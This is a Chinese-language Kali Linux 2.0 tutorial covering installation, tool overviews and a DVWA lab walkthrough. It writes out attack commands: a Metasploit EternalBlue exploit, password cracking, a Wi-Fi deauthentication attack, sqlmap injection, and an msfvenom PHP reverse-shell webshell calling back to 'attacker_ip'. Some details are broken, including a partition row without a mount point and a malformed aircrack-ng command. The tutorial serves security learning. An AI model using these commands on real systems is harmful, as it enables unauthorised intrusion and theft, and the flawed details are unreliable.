安装与基础配置
Kali Linux 2.0作为渗透测试领域的主流操作系统,其安装过程需结合硬件环境选择合适方式,推荐使用虚拟机安装(如VMware或VirtualBox),步骤如下:
- 下载镜像:访问Kali官网下载2.0版本ISO镜像(如kali-linux-2.0-amd64.iso),校验SHA256哈希值确保完整性。
- 创建虚拟机:在VMware中新建虚拟机,选择“自定义高级”,分配至少2GB内存、40GB硬盘空间,并在安装时选择“图形化安装”。
- 分区设置:建议采用LVM逻辑卷管理,便于后续扩容,分区方案如下:
| 分区类型 | 文件系统 | 大小 | 用途 |
|---|---|---|---|
| /boot | ext4 | 512MB | 启动分区 |
| ext4 | 20GB | 根目录 | |
| swap | swap | 4GB | 交换空间 |
| /home | ext4 | 剩余空间 | 用户数据存储 |
- 初始配置:安装完成后设置root密码,创建普通用户(避免直接使用root),执行
apt update && apt upgrade -y更新系统。
核心工具详解
Kali Linux 2.0预置了数百款渗透测试工具,需分类掌握其功能与使用场景。
信息收集工具
- Nmap:端口与服务扫描的基础工具。
nmap -sS -sV -O -p 1-1000 target_ip # 半开扫描、服务版本检测、操作系统识别
- Maltego:开源开源情报(OSINT)分析工具,可关联域名、IP、邮箱等信息。
漏洞利用框架
- Metasploit Framework:核心渗透测试平台,常用命令如下:
msfconsole # 启动控制台 search ms17_010 # 搜索漏洞模块 use exploit/windows/smb/ms17_010_eternalblue # 加载模块 set RHOSTS target_ip # 设置目标IP exploit # 执行利用
密码攻击工具
- John the Ripper:密码破解工具,支持多种哈希算法:
john --format=raw-md5 hashes.txt # 指定哈希类型 john --wordlist=rockyou.txt hashes.txt # 字典攻击
- Hashcat:GPU加速密码破解,性能远超John。
无线安全工具
- Aircrack-ng套件:用于WiFi渗透测试,流程包括:
airmon-ng start wlan0启用监听模式airodump-ng wlan0mon扫描附近WiFiaireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon解认证攻击aircrack-ng -w wordlist.cap破解WPA/WPA2握手包
系统优化与安全加固
长期使用Kali需进行安全配置,避免误操作导致系统损坏或法律风险。
禁用不必要服务
systemctl disable apache2 mysql # 禁用预装服务
配置防火墙
使用UFW(Uncomplicated Firewall)限制访问:
ufw default deny incoming ufw allow 22/tcp # 允许SSH ufw enable
定期更新与备份
apt autoremove -y # 清理冗余包 dpkg --list > package_list.txt # 备份软件列表
实战场景示例:Web渗透测试
以DVWA(Damn Vulnerable Web Application)为靶机,演示渗透流程:
-
信息收集:使用
dirsearch扫描目录:dirsearch -u http://target_ip -e php,html
-
漏洞利用:发现SQL注入点,使用sqlmap获取数据:
sqlmap -u "http://target_ip/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=xxx" --dbs
-
权限提升:通过上传Webshell获取shell权限,使用
msfvenom生成后门:msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php
注意事项与最佳实践
- 合法性:仅授权测试目标,未经授权的渗透测试可能违反法律。
- 数据备份:操作前备份靶机数据,避免破坏性影响。
- 学习路径:建议先掌握基础Linux命令,再逐步深入工具原理,避免沦为“脚本小子”。
通过系统学习Kali Linux 2.0的工具链与渗透方法论,可逐步构建完整的网络安全知识体系,为从事渗透测试、安全运维等职业奠定基础。
